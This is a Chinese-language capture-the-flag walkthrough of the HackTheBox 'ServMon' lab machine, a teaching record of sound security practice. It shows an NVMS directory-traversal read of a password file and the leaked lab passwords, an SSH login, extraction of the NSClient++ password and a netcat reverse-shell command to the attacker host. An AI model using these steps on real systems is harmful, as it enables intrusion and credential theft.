HackTheBox - ServMon

-
通过扫描发现以下服务:

21/tcp   open  ftp           Microsoft ftpd 
22/tcp   open  ssh           OpenSSH for_Windows_7.7  
80/tcp   open  http 
135/tcp  open  msrpc         Microsoft Windows RPC 
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn 
445/tcp  open  microsoft-ds? 
5666/tcp open  tcpwrapped 
6699/tcp open  napster? 
8443/tcp open  ssl/https-alt
FTP服务可以匿名登录,并找到如下信息:

FTP 

125 Data connection already open; Transfer starting. 
01-18-20  12:05PM       <DIR>          Users 
    01-18-20  12:06PM       <DIR>          Nadine 
        Confidential.txt 
    01-18-20  12:08PM       <DIR>          Nathan 
        Notes to do.txt
两个文件内容是:

kali@kali:~/Desktop$ cat Confidential.txt  

Nathan, 

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder. 

Regards 


Nadinekali@kali:~/Desktop$ cat Notes\ to\ do.txt  
1) Change the password for NVMS - Complete 
2) Lock down the NSClient Access - Complete 
3) Upload the passwords 
4) Remove public access to NVMS 
5) Place the secret files in SharePoint
80和8443分别运行着http,https服务,发现其中一个web服务有目录遍历漏洞。

kali@kali:/usr/share/exploitdb$ searchsploit NVMS 
------------------------------------------------------------- ---------------------------------------- 
Exploit Title                                               |  Path 

                                                             | (/usr/share/exploitdb/) 
------------------------------------------------------------- ---------------------------------------- 
NVMS 1000 - Directory Traversal                              | exploits/hardware/webapps/47774.txt
于是结合FTP的两条信息,说是放在桌面了。

/Users/Nathan/Desktop/Passwords.txt 
/Users/Nathan/Desktop/user.txt 

/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt
/../../../../../../../../../../../../Users/Nathan/Desktop/user.txt

1nsp3ctTh3Way2Mars! 
Th3r34r3To0M4nyTrait0r5! 
B3WithM30r4ga1n5tMe 
L1k3B1gBut7s@W0rk 
0nly7h3y0unGWi11F0l10w 
IfH3s4b0Utg0t0H1sH0me 
Gr4etN3w5w17hMySk1Pa5$
获取到了密钥。逐个尝试后发现并不是web服务的,其中一个可以登录ssh服务。

Nadine - L1k3B1gBut7s@W0rk 

kali@kali:/usr/share/exploitdb$ ssh nadine@10.10.10.184 

nadine@10.10.10.184's password:  
  

Microsoft Windows [Version 10.0.18363.752] 
(c) 2019 Microsoft Corporation. All rights reserved. 

nadine@SERVMON C:\Users\Nadine>dir 
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt 
eb9fb287bc89b939e10c5a9aecf45ac8
提权:
上传了WinPEAS.exe,但是并没有发现任何可以利用的信息。之前发现80端口可以本地提权。可以使用。
在SSH中取得当前运行服务的密码,但是无法登录,该服务只能127.0.0.1允许


  

nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display 

Current password: ew2x6SsGTxjRwXOT 

echo c:\temp\nc.exe 10.10.14.231 8989 -e cmd.exe > c:\temp\evil.bat
建立本地代理
    一般的代理不能转发127.0.0.1本地请求。
 ssh -L 9000:127.0.0.1:8443 nadine@10.10.10.184
在服务中设置定时任务:

每一步一定要点击保存

脚本会在一分钟后执行



获取到 administrator 权限:

总的来说,这台机器思路比较清晰,也比较简单。

评论

发表评论